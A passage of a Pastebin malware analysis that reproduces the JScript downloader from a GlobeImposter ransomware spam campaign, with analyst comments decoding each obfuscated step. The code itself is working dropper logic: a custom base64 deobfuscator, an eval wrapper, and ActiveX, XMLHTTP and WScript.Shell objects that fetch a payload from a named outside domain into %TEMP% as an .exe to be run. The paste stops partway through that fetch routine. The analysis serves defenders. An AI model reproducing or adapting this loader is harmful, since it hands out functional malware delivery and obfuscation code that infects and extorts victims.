API tools faq
paste
Advertisement
MalwareBreakdown

Cleaned and commented IMG_1391.js from GlobeImposter malspam

MalwareBreakdown
Aug 8th, 2017
10,891
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.40 KB | None | 0 0
raw download clone embed print report
  1. var PenDone = new Array(12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 75, 12, 12, 12, 76, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 12, 12, 12, 12, 12, 12, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 12, 12, 12, 12, 12, 12, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12);
  2.  
  3. var efFFFFF = 0xff;
  4. var ratatu = "prototype";
  5. /****
  6. var silkopil = "/";
  7. ****/
  8. var silkopil = "\u002f";
  9.  
  10. /****
  11. The purpose of this function declaration is to extend the String.prototype object and define a new function called pineapple(). Ultimately, pineapple() serves as a way to perform on the fly base64 decoding and provide some obscurity in the JavaScript.
  12. The array PenDone, as declared above, doesn't not adequately perform base64 decoding with this function, it isn't until after the array is modified in the for-loop following this function declaration.
  13. ****/
  14. String[ratatu].pineapple = function() {
  15. var SayPaymorris_RazlomSS, SayPaymorris_FROG2ddDccC2, SayPaymorris_Selection1, SayPaymorris_FROG2c4;
  16.  
  17. var SayPaymorris_FROG2out = "";
  18.  
  19. var SayPaymorris_FROG2SayPaymorris_ka = this.replace(/WARHORSE/gi, SayPaymorris_FROG2out);
  20. SayPaymorris_FROG2XCOP = 0;
  21. var SayPaymorris_FROG2len = SayPaymorris_FROG2sud(SayPaymorris_FROG2SayPaymorris_ka);
  22.  
  23. while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len) {
  24. do {
  25. var SayPaymorris_koch = SayPaymorris_FROG2SayPaymorris_ka.charCodeAt(SayPaymorris_FROG2XCOP++) & (0x132 - 0x33);
  26. SayPaymorris_RazlomSS = PenDone[SayPaymorris_koch];
  27. } while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len && SayPaymorris_RazlomSS == -1);
  28.  
  29. if (SayPaymorris_RazlomSS == -1)
  30. break;
  31.  
  32. do {
  33. SayPaymorris_FROG2ddDccC2 = PenDone[SayPaymorris_FROG2SayPaymorris_ka.charCodeAt(SayPaymorris_FROG2XCOP++) & efFFFFF];
  34. } while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len && SayPaymorris_FROG2ddDccC2 == -1);
  35.  
  36. if (SayPaymorris_FROG2ddDccC2 + 1 == 0)
  37. break;
  38.  
  39. SayPaymorris_FROG2out += String.fromCharCode((SayPaymorris_RazlomSS << 2) | ((SayPaymorris_FROG2ddDccC2 & 0x30) >> 4));
  40.  
  41. do {
  42. SayPaymorris_Selection1 = SayPaymorris_FROG2SayPaymorris_ka.charCodeAt(SayPaymorris_FROG2XCOP++) & 0xff;
  43. if (SayPaymorris_Selection1 == 61)
  44. return SayPaymorris_FROG2out;
  45.  
  46. SayPaymorris_Selection1 = PenDone[SayPaymorris_Selection1];
  47. } while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len && SayPaymorris_Selection1 == -1);
  48.  
  49. if (SayPaymorris_Selection1 == -1)
  50. break;
  51.  
  52. SayPaymorris_FROG2out += String.fromCharCode(((SayPaymorris_FROG2ddDccC2 & (0xe + 1)) << 4) | ((SayPaymorris_Selection1 & 0x3c) >> 2));
  53.  
  54. do {
  55. SayPaymorris_FROG2c4 = SayPaymorris_FROG2SayPaymorris_ka.charCodeAt(SayPaymorris_FROG2XCOP++) & efFFFFF;
  56. if (SayPaymorris_FROG2c4 == 61)
  57. return SayPaymorris_FROG2out;
  58.  
  59. SayPaymorris_FROG2c4 = PenDone[SayPaymorris_FROG2c4];
  60. } while (SayPaymorris_FROG2XCOP < SayPaymorris_FROG2len && SayPaymorris_FROG2c4 == -1);
  61.  
  62. if (SayPaymorris_FROG2c4 == -1)
  63. break;
  64.  
  65.  
  66. SayPaymorris_FROG2out += String.fromCharCode(((SayPaymorris_Selection1 & 0x03) << 6) | SayPaymorris_FROG2c4);
  67.  
  68.  
  69. }
  70. return SayPaymorris_FROG2out;
  71. };
  72. var SayPaymorris_SayNoNo = "WARHORSE" + "" + "";
  73.  
  74. function SayPaymorris_FROG2sud(vardos) {
  75. return vardos[("SayPaymorris_webster", "SayPaymorris_jargon", "SayPaymorris_outreach", "SayPaymorris_constipation", "SayPaymorris_consecutive", "l") + "en" + ("SayPaymorris_hybrid", "SayPaymorris_towns", "SayPaymorris_awesome", "SayPaymorris_bookmark", "SayPaymorris_equally", "gt") + "h"];
  76. }
  77.  
  78. /****
  79. The user-agent is set to "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  80. Breaking down this user-agent string:
  81. The version of Mozilla: 4.0
  82. The version of Internet Explorer: 6.0
  83. The version of Windows: NT 5.0 (aka Windows 2000)
  84. ****/
  85. function setRH(CR, VR) {
  86. CR[VR]("User-Agent", "TW96aWxsYS80LjAgWARHORSEKGNvbXBhdGlibGU7IE1TSUUgNi4wOyWARHORSEBXaW5kb3dzIE5UIDUuMCk=".pineapple());
  87. }
  88.  
  89. var turkish;
  90. var velVITK_BOSKO_2S = "IHR1cmtpc2ggPSB7J1UnOidTJyAsICc6JzonLicgLCAnODgnOicnICwgJ0JPTEdBUklOJzonb25zZUJvZHknICwgJzc3JzonJyAsICcxMDEnOicnICwgJ0ZBUklTSE1ZJzonWCcsICAnMTEnOicnfTsNClJlZWJva0dhbGF4eUZST0d0YWxpbHVldiA9IFJlZWJva0dhbGF4eUZST0d2b3N0b2Nobml5Ow0KZm9yICh2YXIgUmVlYm9rR2FsYXh5RlJPRzJYQ09QIGluIHR1cmtpc2gpe1JlZWJva0dhbGF4eUZST0d0YWxpbHVldiA9IFJlZWJva0dhbGF4eUZST0d0YWxpbHVldlsicmVwIiArICJsYWNlIl0oUmVlYm9rR2FsYXh5RlJPRzJYQ09QLCB0dXJraXNoW1JlZWJva0dhbGF4eUZST0cyWENPUF0pO30NCiAgICByZXR1cm4gUmVlYm9rR2FsYXh5RlJPR3RhbGlsdWV2Ow==";
  91.  
  92. /****
  93. var PenDoneHO = 256
  94. ****/
  95. var PenDoneHO = SayPaymorris_FROG2sud(PenDone);
  96. var TortPankaky;
  97.  
  98. /****
  99. After running the for-loop, PenDone has changed. This new array is going to be used with the String.prototype.pineapple() method call to perform base64 decoding on-the-fly.
  100.  
  101. var PenDone = new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1);
  102. ****/
  103. for (velVITK_OBLOM = 0; PenDoneHO > velVITK_OBLOM; ++velVITK_OBLOM) {
  104. PenDone[velVITK_OBLOM] = -3 + PenDone[velVITK_OBLOM];
  105. PenDone[velVITK_OBLOM] = -2 + PenDone[velVITK_OBLOM];
  106. PenDone[velVITK_OBLOM] = -4 + PenDone[velVITK_OBLOM];
  107. PenDone[velVITK_OBLOM] = -4 + PenDone[velVITK_OBLOM];
  108. }
  109.  
  110.  
  111. /****
  112. Re-redeclaration of the function for ease of viewing.
  113.  
  114. function TortPankakyFF() {
  115. var DAS;
  116. function TortPankaky(ReebokGalaxyFROGvostochniy) {
  117. turkish = {'U':'S' , ':':'.' , '88':'' , 'BOLGARIN':'onseBody' , '77':'' , '101':'' , 'FARISHMY':'X', '11':''};
  118. ReebokGalaxyFROGtaliluev = ReebokGalaxyFROGvostochniy;
  119. for (var ReebokGalaxyFROG2XCOP in turkish){
  120. ReebokGalaxyFROGtaliluev = ReebokGalaxyFROGtaliluev["rep" + "lace"](ReebokGalaxyFROG2XCOP, turkish[ReebokGalaxyFROG2XCOP]);
  121. }
  122. return ReebokGalaxyFROGtaliluev;
  123. }
  124.  
  125. }
  126. ****/
  127. var TortPankakyFF = new Function("DAS", "TortPankaky = " + "new Function('ReebokGalaxyFROGvostochniy', velVITK_BOSKO_2S + ".pineapple());");
  128.  
  129.  
  130. function SayPaymorris_FROG2undefilled(velVLUMAHx, velVLUMAHy) {
  131. velVLUMAHx = eww / frr;
  132. velVLUMAHy = velVLUMAHZZ + -245;
  133. };
  134.  
  135. SayPaymorris_FROG2undefilled.dEDWWEE = function() {
  136. SayPaymorris_FROG2ok(SayPaymorris_FROG2spyFunction1.SayPaymorris_FROG2calledWith(), "Function called without arguments");
  137.  
  138. SayPaymorris_FROG2publisher.SayPaymorris_FROG2publish(this.SayPaymorris_FROG2type1, "PROPER1");
  139. SayPaymorris_FROG2ok(SayPaymorris_FROG2spyFunction1.SayPaymorris_FROG2calledWith("PROPER1"), "Function called with 'PROPER1' argument");
  140.  
  141. SayPaymorris_FROG2publisher.SayPaymorris_FROG2publish(this.SayPaymorris_FROG2type1, ["PROPER1", "PROPER2"]);
  142. };
  143. var topSecretLine;
  144.  
  145. var SayPaymorris_LLL0LLL = "l";
  146.  
  147. /****
  148. We can re-write this to substitute in the strings:
  149. var SayPayMorris_FROG2TRUEFALSE = ("Windows Script Host!!!22ee22" == "Windows Script Host!!!22ee22") && typeof(SayPaymorris_FROG2GzEAPd) === "undefined";
  150. The logical comparison will evaulate to true. The two strings are equivalent and the variable "SayPaymorris_FROG2GzEAPd" is not defined; which is also true.
  151. This could be used for evaluation of the base64 decoding to ensure that the pineapple() function is working properly.
  152. ****/
  153. var SayPaymorris_FROG2TRUEFALSE = ("V2lWARHORSEuZG93cyBTY3JpcWARHORSEHQgSG9zdA=WARHORSE=".pineapple() + "!!!22ee22" == "WARHORSEV2lWARHORSEuZG93cyBTY3JpcWARHORSEHQgSG9zdA==".pineapple() + "!!!22ee22") && typeof(SayPaymorris_FROG2GzEAPd) === "undefined";
  154.  
  155. /****
  156. var SayPaymorris_FROGsrq = "RequestHeader";
  157. ****/
  158. var SayPaymorris_FROGsrq = "UmVxdWVzdEhlYWRlcg==".pineapple();
  159.  
  160. TortPankakyFF();
  161.  
  162. /****
  163. var SayPaymorrisFPADRML = "";
  164. ****/
  165. var SayPaymorrisFPADRML = ("").pineapple();
  166.  
  167. /****
  168. var SayPaymorris_FROG2lidgen = "ActiveXObject";
  169. ****/
  170. var SayPaymorris_FROG2lidgen = "QWN0WARHORSEaXZlWEWARHORSE9iamVjdA==".pineapple();
  171.  
  172. /****
  173. var SayPaymorris_FROG2chosen = Math.round(1.0);
  174. var SayPaymorris_FROG2chosen = 1;
  175. ****/
  176. var SayPaymorris_FROG2chosen = Math.round(0.7 * 2 - 0.4);
  177.  
  178. /****
  179. This if-block is executed when SayPaymorris_FROG2TRUEFALSE results in 'false'.
  180. ****/
  181. if (!SayPaymorris_FROG2TRUEFALSE) {
  182. SayPaymorris_FROG2undefilled.scale = function(SayPaymorris_FROG2p, SayPaymorris_FROG2scaleX, SayPaymorris_FROG2scaleY) {
  183. if (SayPaymorris_FROG2XCOPsObject(SayPaymorris_FROG2scaleX)) {
  184. SayPaymorris_FROG2scaleY = SayPaymorris_FROG2scaleX.y;
  185. SayPaymorris_FROG2scaleX = SayPaymorris_FROG2scaleX.x;
  186. } else if (!SayPaymorris_FROG2XCOPsNumber(SayPaymorris_FROG2scaleY)) {
  187. SayPaymorris_FROG2scaleY = SayPaymorris_FROG2scaleX;
  188. }
  189. return new SayPaymorris_FROG2undefilled(SayPaymorris_FROG2p.x * SayPaymorris_FROG2scaleX, SayPaymorris_FROG2p.y * SayPaymorris_FROG2scaleY);
  190. };
  191. }
  192. /****
  193. This if-block is executed when SayPaymorris_FROG2TRUEFALSE results in 'false'.
  194. ****/
  195. if (!SayPaymorris_FROG2TRUEFALSE) {
  196. SayPaymorris_FROG2undefilled.SayPaymorris_FROG2sameOrN = function(SayPaymorris_FROG2param1, SayPaymorris_FROG2param2) {
  197. return SayPaymorris_FROG2param1.D == SayPaymorris_FROG2param2.D || SayPaymorris_FROG2param1.F == SayPaymorris_FROG2param2.F;
  198. };
  199.  
  200. SayPaymorris_FROG2undefilled.angle = function(SayPaymorris_FROG2p) {
  201. return Math.atan2(SayPaymorris_FROG2p.y, SayPaymorris_FROG2p.x);
  202. };
  203. }
  204.  
  205. /****
  206. Calls to this function will perform the eval() function on the input passed to it.
  207. ****/
  208. function SayPaymorrisFPADZO_ZO(TT) {
  209. eval(TT);
  210. }
  211.  
  212. /****
  213. var SayPaymorris_FROG2VARDOCF = "%TEMP%";
  214. ****/
  215. var SayPaymorris_FROG2VARDOCF = "JVRFWARHORSETVAlWARHORSE".pineapple();
  216.  
  217. /****
  218. Re-redeclaration of the function for ease of viewing. This was declared and not used in our instance.
  219.  
  220. function NewNameCreator(WARHORSE, WARHORSE) {
  221. function topSecretLine(vVREBFF3){
  222. return "MS";
  223. }
  224. }
  225. ****/
  226. var NewNameCreator = new Function("WARHORSE,WARHORSE", "topSecretLine = " + ("bmV3IEZ1bmN0aW9uKCd2VlJFQkZGMycsJ3JldHVybiBcIlRWTT1cIg==").pineapple() + ".pineapple();');");
  227.  
  228.  
  229. /****
  230. var SayPaymorris_FROG2sirdallos = "ExpandEnvironmentStrings";
  231. ****/
  232. var SayPaymorris_FROG2sirdallos = "WARHORSERXhwYW5WARHORSEkRW52aXWARHORSEJvbm1lbnRTdHJWARHORSEpbmdz".pineapple();
  233.  
  234. /****
  235. Empty declaration of this function to serve as an interface for extension and creation of new functions.
  236. ****/
  237. var SayPaymorris_FROG2Native = function(options) {
  238.  
  239. };
  240.  
  241. /****
  242. The empty function SayPaymorris_FROG2Native was declared above, and this function is intend to perform extension of the parent function to add custom function implementation. Although this was never called.
  243. ****/
  244. SayPaymorris_FROG2Native.SayPaymorris_FROG2XCOPmplement = function(SayPaymorris_FROG2objects, SayPaymorris_FROG2properties) {
  245. for (var SayPaymorris_FROG2XCOP = 0, SayPaymorris_FROG2l = SayPaymorris_FROG2objects.length; SayPaymorris_FROG2XCOP < SayPaymorris_FROG2l; SayPaymorris_FROG2XCOP++) SayPaymorris_FROG2objects[SayPaymorris_FROG2XCOP].SayPaymorris_FROG2XCOPmplement(SayPaymorris_FROG2properties);
  246. };
  247.  
  248. var SayPaymorris_FROGhatershaha = "";
  249. var SayPaymorris_FROGodnoklass = "XXSkRjf";
  250.  
  251. /****
  252. This function returns a new ActiveXObject of the argument passed into the function call.
  253. ****/
  254. function mexAO(AOn) {
  255. return new ActiveXObject(AOn);
  256. }
  257.  
  258. /****
  259. The variable WSH was never declared and there for does not make the call to NewNameCreator();
  260. ****/
  261. if (WSH) {
  262. NewNameCreator();
  263. }
  264.  
  265. /****
  266. This function was declared and never called.
  267. ****/
  268. function mix2() {
  269. perm_sel[fixed] = fixed; /* Generate random orientation*/
  270. var total = 0;
  271. var ori_sel = Array();
  272. var i = fixed === 0 ? 1 : 0;
  273. for (; i < 7; i = i === fixed - 1 ? i + 2 : i + 1) {
  274. ori_sel[i] = scramblers.lib.randomInt.below(3);
  275. total += ori_sel[i];
  276. }
  277. if (i <= 7) ori_sel[i] = (3 - (total % 3)) % 3;
  278. ori_sel[fixed] = 0; /* Convert to face format*/ /* Mapping from permutation/orientation to facelet*/
  279. var D = 1,
  280. L = 2,
  281. B = 5,
  282. U = 4,
  283. R = 3,
  284. F = 0; /* D 0 1 2 3 L 4 5 6 7 B 8 9 10 11 U 12 13 14 15 R 16 17 18 19 F 20 21 22 23*/ /* Map from permutation/orientation to face*/ /* Convert cubie representation into facelet representaion*/
  285. for (var i = 0; i < 8; i++) {
  286. for (var j = 0; j < 3; j++) posit[pos[i][(ori_sel[i] + j) % 3]] = fmap[perm_sel[i]][j];
  287. }
  288. }
  289.  
  290. /****
  291. var SayPaymorris_FROG2d7 ="XML";
  292. ****/
  293. var SayPaymorris_FROG2d7 = "WA==".pineapple() + "M" + "L";
  294.  
  295. function SayPaymorris_FROG2_bCho(T, D, C) {
  296. R = D + "";
  297. T[D](C);
  298. }
  299.  
  300. /****
  301. var SayPaymorris_FROG2_bChosteck = "http://"
  302. ****/
  303. var SayPaymorris_FROG2_bChosteck = "aHR0cWARHORSEDovLw==";
  304.  
  305. /****
  306. SayPaymorris_FROG2d7 = "MSXML2.XMLHTTP45WARHORSE45WScript.Shell";
  307. ****/
  308. SayPaymorris_FROG2d7 = topSecretLine() + SayPaymorris_FROG2d7 + TortPankaky(("SayPaymorris_recovery", "SayPaymorris_sunflower", "SayPaymorris_digression", "SayPaymorris_effigy", "SayPaymorris_refresh", "2.") + "FARISHMYML77H101T" + "TP45WARHORSE45" + "WS" + "cr" + "ipt:Uh") + "e" + "ll";
  309.  
  310. /****
  311. var SayPaymorris_FROG2DoUtra = [
  312. SayPaymorris_FROG2lidgen,
  313. SayPaymorris_FROG2sirdallos,
  314. SayPaymorris_FROG2VARDOCF,
  315. ".exe",
  316. "Run",
  317. SayPaymorris_FROG2d7
  318. ];
  319. ****/
  320. var SayPaymorris_FROG2DoUtra = [SayPaymorris_FROG2lidgen, SayPaymorris_FROG2sirdallos, SayPaymorris_FROG2VARDOCF, "LmVWARHORSE4ZQ=WARHORSE=".pineapple(), "UnWARHORSEVuWARHORSE".pineapple(), SayPaymorris_FROG2d7];
  321.  
  322. /****
  323. This calls the Array.prototype.shift() methiod that removes the first element of the array and returns that element.
  324. Substituting in the assignment:
  325. SayPaymorris_FROG2Richters = SayPaymorris_FROG2lidgen;
  326. Further simplification:
  327. SayPaymorris_FROG2Richters = ActiveXObject;
  328.  
  329. The resulting array after the shift() is called:
  330. var SayPaymorris_FROG2DoUtra = [
  331. SayPaymorris_FROG2sirdallos,
  332. SayPaymorris_FROG2VARDOCF,
  333. ".exe",
  334. "Run",
  335. SayPaymorris_FROG2d7
  336. ];
  337. ****/
  338. SayPaymorris_FROG2Richters = SayPaymorris_FROG2DoUtra.shift();
  339.  
  340.  
  341. /****
  342. This calls the Array.prototype.pop() method that removes the last element of the array and returns that element.
  343. Substituting in the assignment:
  344. var SayPaymorris_FROG2d2 = SayPaymorris_FROG2d7;
  345. Further simplification:
  346. var SayPaymorris_FROG2d2 = "MSXML2.XMLHTTP45WARHORSE45WScript.Shell";
  347.  
  348. The resulting array after the pop() is called:
  349. var SayPaymorris_FROG2DoUtra = [
  350. SayPaymorris_FROG2sirdallos,
  351. SayPaymorris_FROG2VARDOCF,
  352. ".exe",
  353. "Run"
  354. ];
  355. ****/
  356. var SayPaymorris_FROG2d2 = SayPaymorris_FROG2DoUtra.pop();
  357.  
  358. /****
  359. Variable declared and never used.
  360. ****/
  361. SayPaymorris_FROG2fabled = "Valar2Morgulis";
  362.  
  363. var SayPaymorris_FROG2LitoyDISK = ActiveXObject;
  364.  
  365. /****
  366. Substitute assignment:
  367. var doubleTrouble = "MSXML2.XMLHTTP45WARHORSE45WScript.Shell".split("45");
  368. Simplification:
  369. var doubleTrouble = ["MSXML2.XMLHTTP", "WARHORSE", "WScript.Shell"];
  370. ****/
  371. var doubleTrouble = SayPaymorris_FROG2d2.split("45");
  372.  
  373.  
  374. /****
  375. Function declaration extending the SayPaymorris_FROG2Native function. Adds the method SayPaymorris_FROG2typize(a,b).
  376. ****/
  377. SayPaymorris_FROG2Native.SayPaymorris_FROG2typize = function(a, b) {
  378. a.type || (a.type = function(a) {
  379. return SayPaymorris_FROG2$type(a) === b
  380. })
  381. };
  382.  
  383.  
  384. SayPaymorris_FROGcccomeccc = "p";
  385.  
  386. /****
  387. Re-redeclaration of the function for ease of viewing. A call to this function will return "ADODB.Stream".
  388.  
  389. function Limbus2000(HORN) {
  390. var GALAXY = "chastity necessarily()";
  391. var kelso = "ADODB.Str32";
  392. return kelso.replace("TRUMP", "D").replace("32", "eam");
  393. }
  394. ****/
  395. var Limbus2000 = new Function("HORN", ' var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("TRUMP", "D").replace("32", "eam");');
  396.  
  397.  
  398. /****
  399. SayPaymorris_FROGletchikva = new ActiveXObject(MSXML2.XMLHTTP);
  400. ****/
  401. SayPaymorris_FROGletchikva = new SayPaymorris_FROG2LitoyDISK(doubleTrouble[0]);
  402.  
  403. /****
  404. A call to this function will take the first argument as the Object, the second argument as the method to call, and the third and fourth arguments to be passed into the method call.
  405. ****/
  406. function SayPaymorris_FROG2_cCho(a, b, c, d) {
  407. a[b](c, d)
  408. }
  409.  
  410. /****
  411. This calls the Array.prototype.pop() methiod that removes the last element of the array and returns it.
  412. Substituting in the assignment:
  413. abtest = ["MSXML2.XMLHTTP", "WARHORSE", "WScript.Shell"].pop();
  414. Further simplification:
  415. SayPaymorris_FROG2Richters = "WScript.Shell";
  416.  
  417. The resulting array after the pop() is called:
  418. var doubleTrouble = [
  419. "MSXML2.XMLHTTP",
  420. "WARHORSE"
  421. ];
  422. ****/
  423. abtest = doubleTrouble[SayPaymorris_FROGcccomeccc + "op"]();
  424.  
  425.  
  426. /****
  427. Substitution:
  428. SayPaymorris_oldBitch = ActiveXObject(abtest);
  429. Simplification:
  430. SayPaymorris_oldBitch = ActiveXObject(WScript.Shell);
  431. ****/
  432. SayPaymorris_oldBitch = mexAO('' + abtest);
  433.  
  434. SayPaymorris_FROG2tudabilo1 = "s";
  435.  
  436. /****
  437. This calls the Array.prototype.shift() method, twice. It removes the first element in the array and returns it to becomes the method called by ActiveXObject(WScript.Shell), then the second element as the argument for the method invocation. After substitution is the following:
  438. var SayPaymorris_FROG2vulture = ActiveXObject(WScript.Shell).SayPaymorris_FROG2sirdallos(SayPaymorris_FROG2VARDOCF);
  439. Further simplification:
  440. var SayPaymorris_FROG2vulture = ActiveXObject(WScript.Shell).ExpandEnvironmentStrings("%TEMP%");
  441.  
  442. The resulting array after the double shift() is called:
  443. var SayPaymorris_FROG2DoUtra = [
  444. ".exe",
  445. "Run"
  446. ];
  447. ****/
  448. var SayPaymorris_FROG2vulture = SayPaymorris_oldBitch[SayPaymorris_FROG2DoUtra.shift()](SayPaymorris_FROG2DoUtra.shift());
  449.  
  450. /****
  451. SayPaymorris_FROG2weasel = "GET";
  452. ****/
  453. SayPaymorris_FROG2weasel = "G\x45T";
  454.  
  455. /****
  456. This calls the Array.prototype.shift() method, removing the first element in the array and returns it.
  457. Substitution:
  458. var SayPaymorris_FROG2SIDRENKOV = ".exe";
  459.  
  460. The resulting array after the shift() is called:
  461. var SayPaymorris_FROG2DoUtra = [
  462. "Run"
  463. ];
  464. ****/
  465. var SayPaymorris_FROG2SIDRENKOV = SayPaymorris_FROG2DoUtra.shift();
  466.  
  467.  
  468. /****
  469. This calls the Array.prototype.shift() method, removing the first element in the array and returns it.
  470. The last element has been removed from the SayPaymorris_FROG2DoUtra[] array.
  471. Substitution:
  472. var SayPaymorris_FROG2promises = "Run"
  473.  
  474. The resulting array after the shift() is called:
  475. var SayPaymorris_FROG2DoUtra = [
  476. ];
  477. ****/
  478. var SayPaymorris_FROG2promises = SayPaymorris_FROG2DoUtra.shift();
  479.  
  480. /****
  481. var SayPaymorris_FROG2OCHENA = "open"
  482. ****/
  483. var SayPaymorris_FROG2OCHENA = "b3WARHORSEBlbWARHORSEg==".pineapple();
  484.  
  485. SayPaymorris_FROG2SPASPI = "type";
  486.  
  487. function SayPaymorris_FROG2_aCho(R, K) {
  488. R[K]();
  489. }
  490.  
  491. /****
  492. Calling this function performs the String.prototype.concat() method.
  493. This results in the concatenation of the string "?" with the function supplied input and followed by "=".
  494. ****/
  495. function CNPK(aa) {
  496. return "\x3F".concat(aa, "\x3D");
  497. }
  498.  
  499. /****
  500. This function is called passing in the URLs that are found belonging to the domains.
  501. Sample input:
  502. SayPaymorris_ECOPLAT("http://adelaidemotorshow.com.au/hg65fyJHG??XXSkRjf=XXSkRjf", XXSkRjf1);
  503. ****/
  504. function SayPaymorris_ECOPLAT(SayPaymorris_FROG2gutter, SayPaymorris_FROG2StrokaParam2) {
  505. try {
  506. /****
  507. var SayPaymorris_FROG2CHICKA = ActiveXObject(WScript.Shell).ExpandEnvironmentStrings("%TEMP%");
  508. ****/
  509. var SayPaymorris_FROG2CHICKA = SayPaymorris_FROG2vulture;
  510.  
  511. /****
  512. The forward slash character is appended onto the %TEMP% path stored in SayPaymorris_FROG2CHICKA.
  513. E.g.
  514. %TEMP%/
  515. ****/
  516. SayPaymorris_FROG2CHICKA = SayPaymorris_FROG2CHICKA + silkopil;
  517.  
  518. /****
  519. The temp file name is going to be appended to the end of the file path stored in SayPaymorris_FROG2CHICKA.
  520. E.g.
  521. %TEMP%/XXSkRjf1
  522. ****/
  523. SayPaymorris_FROG2CHICKA = SayPaymorris_FROG2CHICKA + SayPaymorris_FROG2StrokaParam2;
  524.  
  525. /****
  526. ActiveXObject(MSXML2.XMLHTTP).open("GET", "http://adelaidemotorshow.com.au/hg65fyJHG??XXSkRjf=XXSkRjf", false);
  527.  
  528. This calls the ActiveXObject method open() passing in the HTTP method to be used, "GET", the absolute or relative URL, "http://adelaidemotorshow.com.au/hg65fyJHG??XXSkRjf=XXSkRjf", and lastly, whether this is an asynchronous operation, false or synchronous.
  529. ****/
  530. SayPaymorris_FROGletchikva["open"](SayPaymorris_FROG2weasel, SayPaymorris_FROG2gutter, false);
  531.  
  532. /****
  533. This will evaluate to true based on what was assigned to SayPaymorris_FROG2TRUEFALSE, earlier on. As a result, we execute this block.
  534. ****/
  535. if (SayPaymorris_FROG2TRUEFALSE) {
  536. /****
  537. SayPaymorris_FROG2_cCho(ActiveXObject(MSXML2.XMLHTTP), "setRequestHeader", "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  538. After the function call the call looks more like this:
  539. ActiveXObject(MSXML2.XMLHTTP).setRequestHeader("User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  540. This sets the user-agent string in the header before the request to the domain is called. This is the same aforementioned user-agent string.
  541. ****/
  542. SayPaymorris_FROG2_cCho(SayPaymorris_FROGletchikva, "set" + (11, "SayPaymorris_scientists", "SayPaymorris_smash", "SayPaymorris_columnists", "SayPaymorris_conscious", "SayPaymorris_worse", "SayPaymorris_dervish", "SayPaymorris_interstate", SayPaymorris_FROGsrq), "User-Agent", "TW96aWxsYS80LjAgWARHORSEKGNvbXBhdGlibGU7IE1TSUUgNi4wOyWARHORSEBXaW5kb3dzIE5UIDUuMCk=".pineapple());
  543. }
  544.  
  545. /****
  546. Substitution:
  547. SayPaymorris_FROGletchikva[SayPaymorris_FROG2tudabilo1+"end"]();
  548. Simplification:
  549. ActiveXObject(MSXML2.XMLHTTP).send();
  550. ****/
  551. SayPaymorris_FROGletchikva[SayPaymorris_FROG2tudabilo1 + ("SayPaymorris_talkative", "SayPaymorris_squint", "SayPaymorris_episcopal", "SayPaymorris_accrue", "SayPaymorris_keyhole", "end")]();
  552.  
  553. /****
  554. Substition:
  555. var kuzut = SayPaymorris_FROGletchikva["Re"+"sp" + SayPaymorris_FROG2StrokaParam2 + turkish['BOLGARIN']];
  556. Simplification:
  557. var kuzut = ActiveXObject(MSXML2.XMLHTTP).ResponseBody;
  558.  
  559. This set the variable kuzut to the ResponseBody property of the ActiveXObject, which effectively returns the HTTP response.
  560. ****/
  561. var kuzut = SayPaymorris_FROGletchikva["Re" + "sp" + (SayPaymorris_FROG2StrokaParam2, "SayPaymorris_hacker", "SayPaymorris_cartwright", "SayPaymorris_denomination", "SayPaymorris_passively", 1123, turkish['BOLGARIN'])];
  562.  
  563. /****
  564. These two lines were commented out in the original code.
  565. ****/
